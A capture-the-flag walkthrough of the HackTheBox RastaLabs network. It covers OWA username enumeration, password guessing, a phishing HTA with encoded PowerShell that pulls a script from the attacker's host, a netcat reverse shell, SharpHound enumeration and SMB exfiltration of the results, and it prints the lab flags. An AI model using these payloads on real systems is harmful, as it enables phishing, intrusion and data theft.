1 Flag - Humble Beginnings

Connect to the rastalabs vpn and there is a ip routing

➜ hackthebox ip route
default via 192.168.43.1 dev eth1 proto dhcp metric 100
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.5
10.10.110.0/24 via 10.10.14.1 dev tun0
192.168.43.0/24 dev eth1 proto kernel scope link src 192.168.43.60 metric 100
Then perform a nmap on the 10.10.110.0/24

➜ 10.10.110.254-web01 nmap 10.10.110.0/24

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-07 22:26 EDT
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.110.2
Host is up (0.29s latency).
All 1000 scanned ports on 10.10.110.2 are filtered

Nmap scan report for web01.rastalabs.local (10.10.110.254)

Host is up (0.24s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https

Nmap done: 256 IP addresses (2 hosts up) scanned in 334.01 seconds

Got an ip 10.10.110.254

# Nmap 7.80 scan initiated Sun Jun 28 00:12:25 2020 as: nmap -sV -sC -oA scans/nmap.full
-p- -T4 -v 10.10.110.254
Nmap scan report for web01.rastalabs.local (10.10.110.254)
Host is up (0.68s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 5E553264E21D3BCE155802A171DE06AE
|_http-generator: Hugo 0.68.3
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: RastaLabs
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: A362D92EBBA6D2CACFEAC22FA2ECE680
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
| http-title: Outlook
|_Requested resource was
https://web01.rastalabs.local/owa/auth/logon.aspx?url=https%3a%2f%2ffanyv88.com%3a443%2fhttps%2fweb01.rastalabs.l
ocal%2fowa%2f&reason=0
| ssl-cert: Subject: commonName=mx01
| Subject Alternative Name: DNS:mx01, DNS:mx01.rastalabs.local
| Issuer: commonName=mx01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2017-10-15T14:05:13
| Not valid after: 2022-10-15T14:05:13
| MD5: 0618 3659 6c58 f268 07d5 7fa8 4a98 6ec7
|_SHA-1: 5888 ece6 0c32 4df3 621b 3ab2 dd9e 4620 8280 713e
|_ssl-date: 2020-06-28T04:24:03+00:00; +3m03s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

|_clock-skew: 3m02s
Visit the port 80 http://10.10.110.254/about/ On the about us page there is information
about the users , copy the names and make some variation on them

Users.txt
Rhys weston
rhys
weston
rweston
rhysw
weston rhys
westonr
rhysweston
westonrhys
eleanor pugh
pugh eleanor
epugh
pughe
pugh
eleanor
eleanorpugh
pugheleanor
nic godfrey
nicgodfrey
ngodfrey
nicg
nic
godfrey
gnic
godfreynic
amber hope
hope amber
ahope
hopea
hope
amber
ahopeamber
amberh
bradley owen
bradleyowen
owen
bradley
bradleyo
owenb
obradley
owenbradley
tami quinn
tamiq
tami
quinn
quinnt
quinntami
tamiquinn
now there is a login page on the port 443 that is running owa service and there is a
login page

First verifying that which users are valid or do exist , there is a metssploit module
called auxiliary(scanner/http/owa_login)
[+] server type: MX01
[!] No active DB -- Credential data will not be saved!
[*] 10.10.110.254:443 OWA - FAILED LOGIN, BUT USERNAME IS VALID. 0.999779736 'RLAB\ahope'
: 'ahope': SAVING TO CREDS
[*] 10.10.110.254:443 OWA - Trying hopea : hopea
So the valid user is ahope and after some Guessing the password that came to true is

Summer2020for user RLAB\ahope and then login to the https://10.10.110.254/owa

Now there is a flag in tasks/flag
2 Flag - The Fisherman dream
just send a mail to bowen only and do the same process as in 3rd flag and get a shell
as bowen
And goto the roaming dir of bowen on fs01
PS C:\WINDOWS\system32> cd \\fs01\home$\bowen
cd \\fs01\home$\bowen
PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\bowen> cd Desktop
cd Desktop
PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\bowen\Desktop> ls
ls

Directory: \\fs01\home$\bowen\Desktop

Mode LastWriteTime Length Name

---- ------------- ------ ----
-a---- 22/10/2017 21:18 29 flag.txt

PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\bowen\Desktop> cat flag.txt

cat flag.txt
RASTA{w007_f007h0ld_l375_pwn}

3 Flag - brave new world (2nd flag after

this one)
Now i craft a hta file that will be used to phish the users

I created the hta file using the cobalt-strike

<!DOCTYPE html>
<html>

<head>
 <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no"
CAPTION="no" />
<script language="VBScript">
Function var_func()
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run "powershell.exe -e
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuA
GQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQALg
A1ADoAOAAwAC8AcgBlAHYALgBwAHMAMQAnACkAKQA=", 0, true
End Function

var_func
self.close
</script>
</head>

<body>
</body>

</html>

and the encoded data is

echo
"SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAu
AGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADQAL
gA1ADoAOAAwAC8AcgBlAHYALgBwAHMAMQAnACkAKQA=" | base64 -d
IEX ((new-object net.webclient).downloadstring('http://10.10.14.5:80/rev.ps1'))
This will execute my ps1 file if someone will open the hta file and the ps1 file is

iwr -uri http://10.10.14.5:80/nc64.exe -o /windows/tasks/nc.exe

/windows/tasks/nc.exe -e powershell.exe 10.10.14.5 1234

Download my nc from python server and then give me connection back on port 1234

and then send a mail to everyone containing the link to download the hta file

and start the python server where the nc , rev.ps1 , hta file is

Send the email and wait for some time and we will get shell as bowen or tquinn

now just download the sharphound.exe to the machine and run it in \windows\tasks (save
it here for no intruption)
PS C:\windows\tasks> iwr -uri http://10.10.14.5/SharpHound.exe -o sharphound.exe
iwr -uri http://10.10.14.5/SharpHound.exe -o sharphound.exe
and now run the binary to collect information from ldap

PS C:\windows\tasks> .\sharphound.exe /all

.\sharphound.exe /all
----------------------------------------------
Initializing SharpHound at 04:18 on 08/08/2020
----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups,

SPNTargets, Container

[+] Creating Schema map for domain RASTALABS.LOCAL using path

CN=Schema,CN=Configuration,DC=RASTALABS,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS

Status: 0 objects finished (+0) -- Using 23 MB RAM
Status: 148 objects finished (+148 4.933333)/s -- Using 28 MB RAM
Status: 149 objects finished (+1 4.806452)/s -- Using 29 MB RAM
Enumeration finished in 00:00:31.5289398
Compressing data to .\20200808041808_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 04:18 on 08/08/2020! Happy Graphing!

PS C:\windows\tasks> ls
ls

Directory: C:\windows\tasks

Mode LastWriteTime Length Name

---- ------------- ------ ----
-a---- 08/08/2020 04:18 17868 20200808041808_BloodHound.zip
-a---- 08/08/2020 04:18 30331
M2Q5Y2VhYzAtN2Q3Ni00ZmQ1LWIwNDgtMTVhNzYxZDFkZWU4.
bin
-a---- 08/08/2020 04:14 45272 nc.exe
-a---- 08/08/2020 04:17 833536 sharphound.exe
Now we got a new zip file get it to your machine

start impacket-smbserver
➜ smb impacket-smbserver -smb2support share `pwd`
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed

[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
copy the file
PS C:\windows\tasks> copy 20200808041808_BloodHound.zip \\10.10.14.5\share
copy 20200808041808_BloodHound.zip \\10.10.14.5\share
Now stop the server and you have a zip file open it with the bloodhound

Search for tquinn for bowen (Depends on whose shell u got)

We can see that Home directory is \\fs01\home$\tquinn

its a roaming profile we can get to it

PS C:\windows\tasks> cd \\fs01\home$\tquinn
cd \\fs01\home$\tquinn
PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\tquinn> ls
ls

Directory: \\fs01\home$\tquinn

Mode LastWriteTime Length Name

---- ------------- ------ ----
d-r--- 19/03/2020 22:20 Desktop
d-r--- 19/03/2020 21:33 Documents
d-r--- 30/03/2020 12:25 Downloads

PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\tquinn>
there is a flag on Desktop

PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\tquinn\Desktop> cat flag.txt.txt

cat flag.txt.txt
RASTA{br4v3_n3w_w0rld}
PS Microsoft.PowerShell.Core\FileSystem::\\fs01\home$\tquinn\Desktop>